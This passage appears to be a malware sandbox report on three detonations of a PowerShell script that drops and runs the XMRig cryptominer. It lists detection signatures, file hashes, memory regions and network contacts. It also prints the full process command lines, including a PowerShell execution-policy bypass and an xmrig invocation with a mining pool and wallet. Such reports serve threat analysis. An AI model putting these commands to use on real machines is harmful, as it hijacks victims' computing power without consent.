memory/468-55-0x0000025CC6F60000-0x0000025CC6F80000-memory.dmp
memory/468-54-0x0000025CC6F40000-0x0000025CC6F60000-memory.dmp
memory/468-56-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-57-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-59-0x0000025CC6F60000-0x0000025CC6F80000-memory.dmp
memory/468-58-0x0000025CC6F40000-0x0000025CC6F60000-memory.dmp
memory/468-60-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-61-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-62-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-63-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-64-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-65-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-66-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-67-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-68-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-69-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-70-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-71-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-72-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-73-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-74-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-75-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-76-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-77-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-78-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-79-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-80-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-81-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-82-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
294s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1216 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1216 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/1216-0-0x00007FF864F03000-0x00007FF864F05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1uk0xzbp.1h3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1216-9-0x000001C0793C0000-0x000001C0793E2000-memory.dmp
memory/1216-10-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-11-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-12-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-13-0x00007FF864F03000-0x00007FF864F05000-memory.dmp
memory/1216-14-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-15-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/1216-17-0x000001C079B10000-0x000001C079B22000-memory.dmp
memory/1216-18-0x000001C079590000-0x000001C07959A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2108-49-0x0000020D02060000-0x0000020D02080000-memory.dmp
memory/1216-50-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp
memory/2108-51-0x0000020D020A0000-0x0000020D020C0000-memory.dmp
memory/2108-52-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-53-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-55-0x0000020D020C0000-0x0000020D020E0000-memory.dmp
memory/2108-54-0x0000020D020E0000-0x0000020D02100000-memory.dmp
memory/2108-56-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-57-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-60-0x0000020D020C0000-0x0000020D020E0000-memory.dmp
memory/2108-58-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-59-0x0000020D020E0000-0x0000020D02100000-memory.dmp
memory/2108-61-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-62-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-63-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-64-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-65-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-66-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-67-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-68-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-69-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-70-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-71-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-72-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-73-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-74-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-75-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-76-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-77-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-78-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-79-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-80-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-81-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
memory/2108-82-0x00007FF6A6A00000-0x00007FF6A7633000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
295s
Max time network
306s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4244 wrote to memory of 2480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4244 wrote to memory of 2480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2392 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
memory/4244-0-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1wbs2mj.bkn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4244-6-0x0000026C85C00000-0x0000026C85C22000-memory.dmp
memory/4244-11-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
memory/4244-12-0x00007FFA05EA3000-0x00007FFA05EA5000-memory.dmp
memory/4244-13-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
memory/4244-14-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
memory/4244-15-0x00007FFA05EA0000-0x00007FFA06961000-memory.dmp
memory/4244-18-0x0000026C9EAC0000-0x0000026C9EACA000-memory.dmp
memory/4244-17-0x0000026C9EF90000-0x0000026C9EFA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2480-49-0x000001963BE30000-0x000001963BE50000-memory.dmp
memory/2480-50-0x000001963BE90000-0x000001963BEB0000-memory.dmp
memory/2480-51-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-52-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-54-0x000001963BEB0000-0x000001963BED0000-memory.dmp
memory/2480-53-0x00000196D0320000-0x00000196D0340000-memory.dmp
memory/2480-55-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-56-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-59-0x000001963BEB0000-0x000001963BED0000-memory.dmp
memory/2480-58-0x00000196D0320000-0x00000196D0340000-memory.dmp
memory/2480-57-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-60-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-61-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-62-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-63-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-64-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-65-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-66-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-67-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-68-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-69-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-70-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-71-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-72-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-73-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-74-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-75-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-76-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-77-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-78-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
memory/2480-79-0x00007FF7FC880000-0x00007FF7FD4B3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
299s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 548 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4840 wrote to memory of 548 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.150.79.40.in-addr.arpa | udp |
Files
memory/4840-0-0x00007FF971183000-0x00007FF971185000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ym2rnfq1.yz5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4840-10-0x0000021EA5280000-0x0000021EA52A2000-memory.dmp
memory/4840-11-0x00007FF971180000-0x00007FF971C41000-memory.dmp
memory/4840-12-0x00007FF971180000-0x00007FF971C41000-memory.dmp
memory/4840-13-0x00007FF971180000-0x00007FF971C41000-memory.dmp
memory/4840-14-0x00007FF971183000-0x00007FF971185000-memory.dmp
memory/4840-15-0x00007FF971180000-0x00007FF971C41000-memory.dmp
memory/4840-16-0x00007FF971180000-0x00007FF971C41000-memory.dmp
memory/4840-17-0x00007FF971180000-0x00007FF971C41000-memory.dmp
memory/4840-19-0x0000021EA76F0000-0x0000021EA7702000-memory.dmp
memory/4840-20-0x0000021EA76E0000-0x0000021EA76EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/548-51-0x000001F5D1030000-0x000001F5D1050000-memory.dmp
memory/548-52-0x000001F5D1070000-0x000001F5D1090000-memory.dmp
memory/548-53-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-54-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-55-0x000001F5D1090000-0x000001F5D10B0000-memory.dmp
memory/548-56-0x000001F5D10B0000-0x000001F5D10D0000-memory.dmp
memory/548-57-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-58-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-60-0x000001F5D10B0000-0x000001F5D10D0000-memory.dmp
memory/548-59-0x000001F5D1090000-0x000001F5D10B0000-memory.dmp
memory/548-61-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-62-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-63-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-64-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-65-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-66-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-67-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-68-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-69-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-70-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
memory/548-71-0x00007FF6309C0000-0x00007FF6315F3000-memory.dmp
